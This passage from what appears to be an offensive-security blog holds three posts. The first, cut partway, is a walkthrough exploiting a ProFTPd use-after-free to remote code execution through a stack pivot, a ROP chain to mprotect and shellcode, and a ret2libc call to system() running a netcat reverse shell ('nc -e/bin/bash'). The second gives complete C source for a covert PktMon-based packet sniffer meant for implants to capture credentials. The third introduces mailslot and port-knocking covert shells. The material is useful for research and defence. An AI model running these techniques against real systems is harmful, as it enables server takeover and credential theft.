5) Craft the fake pool_rec struct, point fake_pool->parent, fake_pool->sub_next and fake_pool->sub_prev to any writable address, and fake_pool->cleanup to a fake cleanup_t struct containing our arbitrary RIP and RDI values

This is the result of exploiting the hijack technique:

*0x4242424242424242 (
   $rdi = 0x4141414141414141,
   $rsi = 0x0000000000000000,
   $rdx = 0x4242424242424242,
   $rcx = 0x0000555555579c00 β†’ <entry_remove+0> endbr64 
)

As you can see c->plain_cleanup_cb has value 0x4242424242424242, and c->data has value 0x4141414141414141.

Which means RIP and RDI are fully controlled.

Getting RCE

As explained, our main target is reaching run_cleanups() function with an arbitrary address, or with a non-arbitrary address but controlling it’s content. This allow us to obtain full RIP and RDI control, which taking into account that we already have predictable addresses for every segment, means a Remote Code Execution is likely to be possible.

Some ways to obtain Remote Code Execution:

Stack pivot, ROP and shellcode execution

As we control both RIP and RDI, we could search for useful gadgets that would allow us to redirect control-flow using a ROPchain to bypass NX.

When reaching run_cleanups()…

gef➀  p *c
$7 = {
  data = 0x563593915280,
  plain_cleanup_cb = 0x7f875ab201a1 <authnone_marshal+17>,
  child_cleanup_cb = 0x4141414141414141,
  next = 0x4242424242424242
}
gef➀  x/2i c->plain_cleanup_cb
   0x7f875ab201a1 <authnone_marshal+17>:	push   rdi
   0x7f875ab201a2 <authnone_marshal+18>:	pop    rsp
gef➀  

When entering on the stack pivot gadget:

 β†’ 0x7f875ab201a1 <authnone_marshal+17> push   rdi
   0x7f875ab201a2 <authnone_marshal+18> pop    rsp
   0x7f875ab201a3 <authnone_marshal+19> lea    rsi, [rdi+0x48]
   0x7f875ab201a7 <authnone_marshal+23> mov    rdi, r8
   0x7f875ab201aa <authnone_marshal+26> mov    rax, QWORD PTR [rax+0x18]
   0x7f875ab201ae <authnone_marshal+30> jmp    rax

We crafted previously our resp_pool struct to point rax to the address where an address pointing near a ret instruction is stored. So when:

mov    rax, QWORD PTR [rax+0x18]

is executed, we get in rax the address, which will be used just on next instruction: jmp rax.

As it is near a ret instruction, we will finally execute our ROPchain as we pointed rsp right before our ROPchain, and a ret instruction just got executed.

gef➀  p $rax
$5 = 0x563593915358
gef➀  x/gx $rax + 0x18
0x563593915370:	0x00007f875a9fc679
gef➀  x/i 0x00007f875a9fc679
   0x7f875a9fc679 <__libgcc_s_init+61>:	ret 

At the time of jmp rax:

   0x7f875ab201a3 <authnone_marshal+19> lea    rsi, [rdi+0x48]
   0x7f875ab201a7 <authnone_marshal+23> mov    rdi, r8
   0x7f875ab201aa <authnone_marshal+26> mov    rax, QWORD PTR [rax+0x18]
 β†’ 0x7f875ab201ae <authnone_marshal+30> jmp    rax
   0x7f875ab201b0 <authnone_marshal+32> xor    eax, eax
   0x7f875ab201b2 <authnone_marshal+34> ret    

--------------------------------------------------------------

gef➀  p $rax
$6 = 0x7f875a9fc679
gef➀  x/i $rax
   0x7f875a9fc679 <__libgcc_s_init+61>:	ret 

And we can see stack was pivoted successfully:

gef➀  p $rsp
$7 = (void *) 0x563593915358
gef➀  x/gx 0x563593915358
0x563593915358:	0x00007f875aa21550
gef➀  x/i 0x00007f875aa21550
   0x7f875aa21550 <mblen+112>:	pop    rax

ROPchain will setup a syscall call to SYS_mprotect, which will change memory protection for a heap range to RXW. Then, we will jump into the shellcode, thus finally achieving Remote Code Execution

If we check the mappings with gdb we can see that part of the heap is now RWX, which is actually where the shellcode resides:

0x0000563593889000 0x00005635938cb000 0x0000000000000000 rw- [heap]
0x00005635938cb000 0x0000563593915000 0x0000000000000000 rw- [heap]
0x0000563593915000 0x0000563593916000 0x0000000000000000 rwx [heap]
0x0000563593916000 0x000056359394e000 0x0000000000000000 rw- [heap]

Now we are jumping to shellcode, as it now resides on executable memory, so Remote Code Execution succeed:

   0x7f875aa3d229 <funlockfile+73> syscall 
 β†’ 0x7f875aa3d22b <funlockfile+75> ret    
   ↳  0x563593915310                  push   0x29
      0x563593915312                  pop    rax
      0x563593915313                  push   0x2
      0x563593915315                  pop    rdi
      0x563593915316                  push   0x1
      0x563593915318                  pop    rsi

Chaining all this together into an exploit, this is an screenshot of the successful exploitation of this vulnerability using the ROP approach:

Demo

ret2libc or ret2X

You can jump to any function and control one argument, this means you can call any function with an arbitrary argument. You can reuse register values for other arguments aswell, but you rely on current registers to be valid for target function, eg.: an invalid pointer would trigger a crash

The approach I followed with this method is calling system() and pointing RDI to a custom command string (netcat reverse shell) I leave in heap with a predictable address.

First we reach destroy_pool() with the fake pool_rec struct, actually we reuse entries from our initially controlled struct:

gef➀  p *p
$1 = {
  first = 0x563f5c9c6280,
  last = 0x7361626174614472,
  cleanups = 0x563f5c9a62d0,
  sub_pools = 0x563f5c9a6298,
  sub_next = 0x563f5c9a62a0,
  sub_prev = 0x563f5c9a0a90,
  parent = 0x563f5c94a738,
  free_first_avail = 0x563f5c94a7e0 "\260\251\224\\?V",
  tag = 0x563f5c9a526e ""
}
gef➀  p *resp_pool
$2 = {
  first = 0x563f5c9a62d0,
  last = 0x563f5c9a6298,
  cleanups = 0x563f5c9a62a0,
  sub_pools = 0x563f5c9a0a90,
  sub_next = 0x563f5c94a738,
  sub_prev = 0x563f5c94a7e0,
  parent = 0x563f5c9a526e,
  free_first_avail = 0x563f5c9a526e "",
  tag = 0x563f5c9a526e ""
}

Then, destroy_pool() is going to call clear_pool(), which finally ends up calling run_cleanups() with our fake cleanup_t struct, pointed to by p->cleanups:

gef➀  p *c
$3 = {
  data = 0x563f5c9a62f0,
  plain_cleanup_cb = 0x7fca503f1410 <__libc_system>,
  child_cleanup_cb = 0x4141414141414141,
  next = 0x4242424242424242
}
gef➀  x/s c->data
0x563f5c9a62f0:	"nc -e/bin/bash 127.0.0.1 4444"

As we can see c->plain_cleanup_cb (future RIP) points to __libc_system(), and c->data points to our command string stored on heap

The result if we continue, is the execution of a new process as part of the command execution: process 35209 is executing new program: /usr/bin/ncat

And finally obtaining a reverse shell as the user you logged in with into the FTP server.

Demo

RCE Video Demo also available on GitHub (same directory where the exploit resides)

Patch

You can find the GitHub issue and patches for this vulnerability here.

Conclusion

On this post we analyzed and demonstrated exploitation for a Use-After-Free in ProFTPd, and could get full Remote Code Execution even with all the protections turned on (ASLR, PIE, NX, RELRO, STACKGUARD etc)

Perhaps authentication is needed, this is sometimes a situation an attacker has, but can not go forward without a RCE exploit like this.

You can find the ROP approach exploit here.

You can find the other exploit using system() and netcat here.

EoF

We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.

Adding a native sniffer to your implants: decomposing and recomposing PktMon

9 July 2021 at 00:00

Dear Fellowlship, today’s homily is about how to add a sniffer to our implant. To accomplish this task we are going to dissect the native tool PktMon.exe, so we can learn about its internals in order to emulate its functionalities. Please, take a seat and listen to the story.

Prayers at the foot of the Altar a.k.a. disclaimer

In this article we are going to touch on some topics that we are not familiar with, so it is possible that we make some minor mistakes. If you find any, please do not hesitate to contact us so we can correct it.

Introduction

Some years ago we had to face a Red Team operation where at some point we discovered that a lot of machines were running a Backup service. This Backup service was old as hell and it was composed by a central node and agents installed in each machine that were enrolled in this β€œcentral server”.

When a management task had to be executed (for example, to schedule a backup or to check agent stats) the central node sent the order to the target machine. To load those orders the central server had to authenticate against each agent and here comes the magic: the authentication was unencrypted and shared between machines. Getting those credentials meant RCE in all the machines that had the agent installed (to perform a backup task you could configure arbitrary pre/post system commands, so it was a insta-pwn). A lot of techniques can be used to intercept those credentials (injecting a hook, reversing the application in order to understand how the credentials are saved…), but undoubtedly the easiest and painless way is to use a sniffer.

Today most of the communications between services are encrypted (SSL/TLS ftw!) and a sniffer inside a Red Team operation or a pentest is something that you are going to use only in a corner-case. But learning new things is always useful: you never know when this info can save your ass. So here we are! Let’s build a shitty PoC able to sniff traffic!

In windows we have the utility PktMon:

Packet Monitor (Pktmon) is an in-box, cross-component network diagnostics tool for Windows. It can be used for packet capture, packet drop detection, packet filtering and counting. The tool is especially helpful in virtualization scenarios, like container networking and SDN, because it provides visibility within the networking stack. Packet Monitor is available in-box via pktmon.exe command on Windows 10 and Windows Server 2019 (Version 1809 and later).

As the descriptions states, it is exactly the place where we should start to peek an eye.

Phase I: decompose

Before feeding our disassembler with PktMon.exe we can extract some clues about what we should focus. First in the syntax page we have this text:

Packet Monitor generates log files in ETL format. There are multiple ways to format the ETL file for analysis

We can deduce that we are interested in code related with Event Trace Log files. Also the documentation for pktmon unload states:

Stop the PktMon driver service and unload PktMon.sys. Effectively equivalent to β€˜sc.exe stop PktMon’. Measurement (if active) will immediately stop, and any state will be deleted (counters, filters, etc.).

If sc is related, it means that we are going to deal with services. So the first thing to look are functions related with β€œservice”. With the symbol search in Binary Ninja we can find that OpenServiceW is used with the parameter β€œPktMon”, so it rings the bell.

OpenServiceW
OpenServiceW with "PktMon" as parameter (function OpenService_PktMon was renamed by us).

Checking for cross-references leads us to this other function, where we can see clearly how it calls our renamed OpenService_PktMon (where the OpenServiceW was located) and if everything goes OK it opens the device β€œPktMonDev”.

Device
Opening the device "PktMonDev".

So far we know that our PktMon start a service called β€œPktMon” and it opens a handle to the device β€œPktMonDev”. Playing with drivers means that we are going to deal with IOCTL codes. Indeed if we check again for cross-references we can see how the handle obtained before is used in a DeviceIoControl call:

DeviceIoControl
Calling DeviceIoControl() (yep, DeviceIoControl_Arbitrary -and also the args- was renamed by us).

At this point we can use a mix of static and dynamic analysis to check what IOCTLs are used and for what task. Just run PktMon start -c --pkt-size 0 inside a debugger, put a breakpoint at DeviceIoControl and check where the IOCTL appears in the disassembly (the same approach can be done with Frida or any other tool that let you hook the function to check the parameters).

After one hour wasted reversing this (yeah, we are slow as hell because our skills doing RE are close to zero) we noticied that in System32 exists a DLL called PktMonApi.dll… and if you check the exports…

DeviceIoControl
*Extreme Facepalm*. Each export is verbose enough to undertand exactly what does each IOCTL.

So… yes, we could save a lot of time to understand what does each call to DeviceIoControl by just looking this DLL. Shame on us!

The IOCTL for the β€œstart” parameter is 0x220404. Let’s check the registers when DeviceIoControl is called with this code:

RAX : 0000000000000000
RBX : 0000000000220404
RCX : 0000000000000188 <= Handle to \\.\PktMonDev    
RDX : 0000000000220404 <= IOCTL for "PktMonStart"
RBP : 0000000000000188     
RSP : 00000077D027FC28
RSI : 00000077D027FDB8
RDI : 0000000000000014
R8  : 00000077D027FDB8 <= Input buffer
R9  : 0000000000000014 <= Input size
R10 : 00000FFF26BD722B
R11 : 00000077D027FCC0
R12 : 0000000000000000
R13 : 00000192BDDE0570
R14 : 0000000000000001
R15 : 0000000000000000
RIP : 00007FF935E9AC00     <kernelbase.DeviceIoControl>

To get the input transmited to the driver we just have to read R9 bytes at address contained in R8:

0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x01, 0x0, 0x00, 0x00 

This message tells the driver that should start capturing fully packets (by default the packets are truncated to 128 bytes, with --pkt-size 0 we disable this limit).

If we want to add a filter (because we are only interested in a service that uses X port) we need to use the IOCTL 0x220410 which uses a bigger input (0xD8 bytes) with the next layout:

Input buffer for PktMonAddFilter
Input buffer for PktMonAddFilter.

As we can see the marked XX II bytes corresponds to the port. If we want to capture the traffic exchanged in port 14099, our input buffer will be:

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
(...)
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x37, 0x00, 0x00, 0x00, 0x00,
(...)

So far at this point we know how to communicate with the driver in order to initate the capture of traffic and how to set capture filters based on ports. But… how are we going to collect and save the data? The MSDN page stated that packets are saved as ETL. Let’s search for symbols related to event logging!

StartTraceW
References to ETL related functions

If we set a breakpoint on those functions and run PktMon.exe we are going to hit them. We are interested in EnableTraceEx2 because it receives as parameter the provider GUID which indicates the event trace provider we are going to enable.

RAX : 0000000000000012
RBX : 0000017419FE01B0
RCX : 000000000000001A
RDX : 0000017419FE01B0 
RBP : 0000003FB196F650
RSP : 0000003FB196F548
RSI : 0000017419FE01F0     
RDI : 0000000000000000
R8  : 0000000000000001
R9  : 0000000000000004
R10 : 0000017419FC0000
R11 : 0000003FB196F430
R12 : 0000000000000000
R13 : 0000017419FE01B0
R14 : 0000000000000000
R15 : 0000000000000001
RIP : 00007FF8F7389910     <sechost.EnableTraceEx2>

The GUID is a 128-bit value. Let’s retrieve it from 17419FE01B0:

D9 80 4F 4D BD C8 73 4D BB 5B 19 C9 04 02 C5 AC

This translates to the GUID {4D4F80D9-C8BD-4D73-BB5B-19C90402C5AC}. If we google this value we reach this reference from Microsoft’s repo that confirms the value:

(...)
[RegisterBefore(NetEvent.UserData, MicrosoftWindowsPktMon, "{4d4f80d9-c8bd-4d73-bb5b-19c90402c5ac}")]
(...)

To recap:

  • PktMon starts a service and communicate to the driver via \\.\PktMonDev device.
  • Uses the IOCTL 0x220410 to set the filter and 0x220404 to start capturing traffic
  • The packets are saved as events, so it creates a trace session to log the info in a .etl file (or info can be sent to the output in real-time).

Ooook. We have enough info to start to build our PoC

Phase II: recompose

MSDN provides an example of how to start a trace session. We are going to use this example as base to enable the trace:

//...
#define LOGFILE_PATH "C:\\Windows\\System32\\ShabbySniffer.etl"
#define LOGSESSION_NAME "My Shabby Sniffer doing things"
//...

DWORD initiateTrace(void) {
	static const GUID sessionGuid = { 0x6f0aaf43, 0xec9e, 0xa946, {0x9e, 0x7f, 0xf9, 0xf4, 0x13, 0x37, 0x13, 0x37 } };  
	static const GUID providerGuid = { 0x4d4f80d9, 0xc8bd, 0x4d73, {0xbb, 0x5b, 0x19, 0xc9, 0x04, 0x02, 0xc5, 0xac } }; // {4D4F80D9-C8BD-4D73-BB5B-19C90402C5AC}

	// Taken from https://docs.microsoft.com/en-us/windows/win32/etw/example-that-creates-a-session-and-enables-a-manifest-based-provider
	ULONG status = ERROR_SUCCESS;
	TRACEHANDLE sessionHandle = 0;
	PEVENT_TRACE_PROPERTIES pSessionProperties = NULL;
	ULONG bufferSize = 0;
	BOOL TraceOn = TRUE;

	bufferSize = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(LOGFILE_PATH) + sizeof(LOGSESSION_NAME);
	pSessionProperties = (PEVENT_TRACE_PROPERTIES)malloc(bufferSize);

	ZeroMemory(pSessionProperties, bufferSize);
	pSessionProperties->Wnode.BufferSize = bufferSize;
	pSessionProperties->Wnode.Flags = WNODE_FLAG_TRACED_GUID;
	pSessionProperties->Wnode.ClientContext = 1; //QPC clock resolution
	pSessionProperties->Wnode.Guid = sessionGuid;
	pSessionProperties->LogFileMode = EVENT_TRACE_FILE_MODE_CIRCULAR;
	pSessionProperties->MaximumFileSize = 50;  // 50 MB
	pSessionProperties->LoggerNameOffset = sizeof(EVENT_TRACE_PROPERTIES);
	pSessionProperties->LogFileNameOffset = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(LOGSESSION_NAME);
	StringCbCopyA(((LPSTR)pSessionProperties + pSessionProperties->LogFileNameOffset), sizeof(LOGFILE_PATH), LOGFILE_PATH);

	status = StartTraceA(&sessionHandle, LOGSESSION_NAME, pSessionProperties);
	if (status != ERROR_SUCCESS) {
		printf("[!] StartTraceA failed!\n");
		return -1;
	}
	status = EnableTraceEx2(sessionHandle, &providerGuid, EVENT_CONTROL_CODE_ENABLE_PROVIDER, TRACE_LEVEL_INFORMATION, 0, 0, 0, NULL);
	if (status != ERROR_SUCCESS) {
		printf("[!] EnableTraceEx2 failed!\n");
		return -1;
	}
	return 0;
}
//...

As this is just a PoC we are going to use EVENT_TRACE_FILE_MODE_CIRCULAR file mode. Exists different logging modes that can fit better for our purposes (for example generating a new file each time we reach the maximum size, so you can delete older files).

Implementing the driver communication is easy because the pseudocode obtained from Binary Ninja is pretty clear. First, let’s start the service and open a handle to the device:

//...
HANDLE PktMonServiceStart(void) {
	SC_HANDLE hManager;
	SC_HANDLE hService;
	HANDLE hDriver;
	BOOL status;

	hManager = OpenSCManagerA(NULL, "ServicesActive", SC_MANAGER_CONNECT); // SC_MANAGER_CONNECT == 0x01
	if (!hManager) {
		return NULL;
	}
	hService = OpenServiceA(hManager, "PktMon", SERVICE_START | SERVICE_STOP); // 0x10 | 0x20 == 0x30
	CloseServiceHandle(hManager);

	status = StartServiceA(hService, 0, NULL);
	CloseServiceHandle(hService);

	hDriver = CreateFileA("\\\\.\\PktMonDev", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); // 0x80000000 | 0x40000000 == 0xC0000000; OPEN_EXISTING == 0x03; FILE_ATTRIBUTE_NORMAL == 0x80
	if (hDriver == INVALID_HANDLE_VALUE) {
		return NULL;
	}
	return hDriver;
}
//...

In our PoC we are going to create a filter to intercept the traffic throught 14099 port (yeah we love 1337 jokes) and then start capturing the traffic:

//...
DWORD initiateCapture(HANDLE hDriver) {
	BOOL status;
	DWORD IOCTL_start = 0x220404;
	DWORD IOCTL_filter = 0x220410;

	LPVOID IOCTL_start_InBuffer = NULL;
	DWORD IOCTL_start_bytesReturned = 0;
	char IOCTL_start_message[0x14] = { 0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x01, 0x0, 0x00, 0x00 };

	LPVOID IOCTL_filter_InBuffer = NULL;
	DWORD IOCTL_filter_bytesReturned = 0;
	char IOCTL_filter_message[0xD8] = {
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x37, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
					};


	IOCTL_filter_InBuffer = (LPVOID)malloc(0xD8);
	memcpy(IOCTL_filter_InBuffer, IOCTL_filter_message, 0xD8);
	status = DeviceIoControl(hDriver, IOCTL_filter, IOCTL_filter_InBuffer, 0xD8, NULL, 0, &IOCTL_filter_bytesReturned, NULL);
	if (!status) {
		printf("[!] Error! Filter creation failed!\n");
		return -1;
	}


	IOCTL_start_InBuffer = (LPVOID)malloc(0x14);
	memcpy(IOCTL_start_InBuffer, IOCTL_start_message, 0x14);
	status = DeviceIoControl(hDriver, IOCTL_start, IOCTL_start_InBuffer, 0x14, NULL, 0, &IOCTL_start_bytesReturned, NULL);
	if (status) {
		return 0;
	}
	return -1;
}
//...

PoC || GTFO

All the parts are created, we only need to glue them together :).

Working PoC
Working PoC. Communication sniffed succesfully!

Keep in mind that in this PoC we did not clean up anything!!. For that you need to add code that:

  • Kindly ask the driver to stop capturing and stop the service (check PktMonAPI.dll ;))
  • Disable the trace session (check EVENT_CONTROL_CODE_DISABLE_PROVIDER and EVENT_TRACE_CONTROL_STOP)

After this warning, here is the shitty PoC:

/* Shabby PktMon (PoC) by Juan Manuel Fernandez (@TheXC3LL) */

#include <windows.h>
#include <stdio.h>
#include <evntrace.h>
#include <strsafe.h>

#define LOGFILE_PATH "C:\\Windows\\System32\\ShabbySniffer.etl"
#define LOGSESSION_NAME "My Shabby Sniffer doing things"

HANDLE PktMonServiceStart(void) {
	SC_HANDLE hManager;
	SC_HANDLE hService;
	HANDLE hDriver;
	BOOL status;

	hManager = OpenSCManagerA(NULL, "ServicesActive", SC_MANAGER_CONNECT); // SC_MANAGER_CONNECT == 0x01
	if (!hManager) {
		return NULL;
	}
	hService = OpenServiceA(hManager, "PktMon", SERVICE_START | SERVICE_STOP); // 0x10 | 0x20 == 0x30
	CloseServiceHandle(hManager);

	status = StartServiceA(hService, 0, NULL);
	CloseServiceHandle(hService);

	hDriver = CreateFileA("\\\\.\\PktMonDev", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); // 0x80000000 | 0x40000000 == 0xC0000000; OPEN_EXISTING == 0x03; FILE_ATTRIBUTE_NORMAL == 0x80
	if (hDriver == INVALID_HANDLE_VALUE) {
		return NULL;
	}
	return hDriver;
}

DWORD initiateCapture(HANDLE hDriver) {
	BOOL status;
	DWORD IOCTL_start = 0x220404;
	DWORD IOCTL_filter = 0x220410;

	LPVOID IOCTL_start_InBuffer = NULL;
	DWORD IOCTL_start_bytesReturned = 0;
	char IOCTL_start_message[0x14] = { 0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x01, 0x0, 0x0, 0x0, 0x01, 0x0, 0x00, 0x00 };

	LPVOID IOCTL_filter_InBuffer = NULL;
	DWORD IOCTL_filter_bytesReturned = 0;
	char IOCTL_filter_message[0xD8] = {
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x13, 0x37, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
		0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
					};


	IOCTL_filter_InBuffer = (LPVOID)malloc(0xD8);
	memcpy(IOCTL_filter_InBuffer, IOCTL_filter_message, 0xD8);
	status = DeviceIoControl(hDriver, IOCTL_filter, IOCTL_filter_InBuffer, 0xD8, NULL, 0, &IOCTL_filter_bytesReturned, NULL);
	if (!status) {
		printf("[!] Error! Filter creation failed!\n");
		return -1;
	}


	IOCTL_start_InBuffer = (LPVOID)malloc(0x14);
	memcpy(IOCTL_start_InBuffer, IOCTL_start_message, 0x14);
	status = DeviceIoControl(hDriver, IOCTL_start, IOCTL_start_InBuffer, 0x14, NULL, 0, &IOCTL_start_bytesReturned, NULL);
	if (status) {
		return 0;
	}
	return -1;
}


DWORD initiateTrace(void) {
	static const GUID sessionGuid = { 0x6f0aaf43, 0xec9e, 0xa946, {0x9e, 0x7f, 0xf9, 0xf4, 0x13, 0x37, 0x13, 0x37 } };  
	static const GUID providerGuid = { 0x4d4f80d9, 0xc8bd, 0x4d73, {0xbb, 0x5b, 0x19, 0xc9, 0x04, 0x02, 0xc5, 0xac } }; // {4D4F80D9-C8BD-4D73-BB5B-19C90402C5AC}

	// Taken from https://docs.microsoft.com/en-us/windows/win32/etw/example-that-creates-a-session-and-enables-a-manifest-based-provider
	ULONG status = ERROR_SUCCESS;
	TRACEHANDLE sessionHandle = 0;
	PEVENT_TRACE_PROPERTIES pSessionProperties = NULL;
	ULONG bufferSize = 0;
	BOOL TraceOn = TRUE;

	bufferSize = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(LOGFILE_PATH) + sizeof(LOGSESSION_NAME);
	pSessionProperties = (PEVENT_TRACE_PROPERTIES)malloc(bufferSize);

	ZeroMemory(pSessionProperties, bufferSize);
	pSessionProperties->Wnode.BufferSize = bufferSize;
	pSessionProperties->Wnode.Flags = WNODE_FLAG_TRACED_GUID;
	pSessionProperties->Wnode.ClientContext = 1; //QPC clock resolution
	pSessionProperties->Wnode.Guid = sessionGuid;
	pSessionProperties->LogFileMode = EVENT_TRACE_FILE_MODE_CIRCULAR;
	pSessionProperties->MaximumFileSize = 50;  // 50 MB
	pSessionProperties->LoggerNameOffset = sizeof(EVENT_TRACE_PROPERTIES);
	pSessionProperties->LogFileNameOffset = sizeof(EVENT_TRACE_PROPERTIES) + sizeof(LOGSESSION_NAME);
	StringCbCopyA(((LPSTR)pSessionProperties + pSessionProperties->LogFileNameOffset), sizeof(LOGFILE_PATH), LOGFILE_PATH);

	status = StartTraceA(&sessionHandle, LOGSESSION_NAME, pSessionProperties);
	if (status != ERROR_SUCCESS) {
		printf("[!] StartTraceA failed!\n");
		return -1;
	}
	status = EnableTraceEx2(sessionHandle, &providerGuid, EVENT_CONTROL_CODE_ENABLE_PROVIDER, TRACE_LEVEL_INFORMATION, 0, 0, 0, NULL);
	if (status != ERROR_SUCCESS) {
		printf("[!] EnableTraceEx2 failed!\n");
		return -1;
	}
	return 0;
}


int main(int argc, char** argv) {
	HANDLE hDriver;

	printf("\t\t-=[ Shabby PktMon by @TheXC3LL ]=-\n\n");

	printf("[*] Starting PktMon service...\n");
	hDriver = PktMonServiceStart();
	if (hDriver == NULL) {
		printf("\t[!] Error! Service PktMon could not be started!\n\n");
		return -1;
	}
	printf("\t[+] SERVICE STARTED SUCCESSFULLY! (Handle: %d)\n", hDriver);

	printf("[*] Initating Event Tracer...\n");
	if (initiateTrace() == -1) {
		printf("\t[!] Error! Could not start the event tracer!\n");
		return -1;
	}
	printf("\t[+] EVENT TRACER STARTED SUCCESSFULLY!\n");

	printf("[*] Adding a filter and initializing capture...\n");
	if (initiateCapture(hDriver) == -1) {
		printf("\t[!] Error! Could not start capturing!\n");
		return -1;
	}
	printf("\n[+] CAPTURE INITIATED SUCCESSFULLY!\n");
	return 0;
}

EoF

We hope you enjoyed this reading! Feel free to give us feedback at our twitter @AdeptsOf0xCC.

Knock! Knock! The postman is here! (abusing Mailslots and PortKnocking for connectionless shells)

18 June 2021 at 00:00

Dear Fellowlship, today’s homily is about how a fool started to play with the idea of controlling a shell remotely without listening to any port (bind shell), or doing a connection back to it (reverse shell). Please, take a seat and listen to the story of a journey to the No-Sockets Land.

Prayers at the foot of the Altar a.k.a. disclaimer

Of course, declaring that we can communicate with other machine without sockets it’s a tricky afirmation: sockets, in a way or another, are needed. We are going to explore the usage of two covert-channels to trasmit information to and from our remote shell, so there are no β€œdirect connections” between the two machines (or in other words: our implant is not going to bind to a local port and it is not going to connect back to our machine, we are going to explore an alternative way. Just have fun and don’t be harsh on us because we used the term β€œconnectionless” :P

Introduction

This post came after crafting a small PoC to satisfy our curiosity. The tactic of keeping a few compromised machines β€œquiet” (without communication with the C2) until a pre-shared combination of ports are hit is something that @TheXC3LL shared in his article β€œStealthier communications & Port Knocking via Windows Filtering Platform (WFP)”.

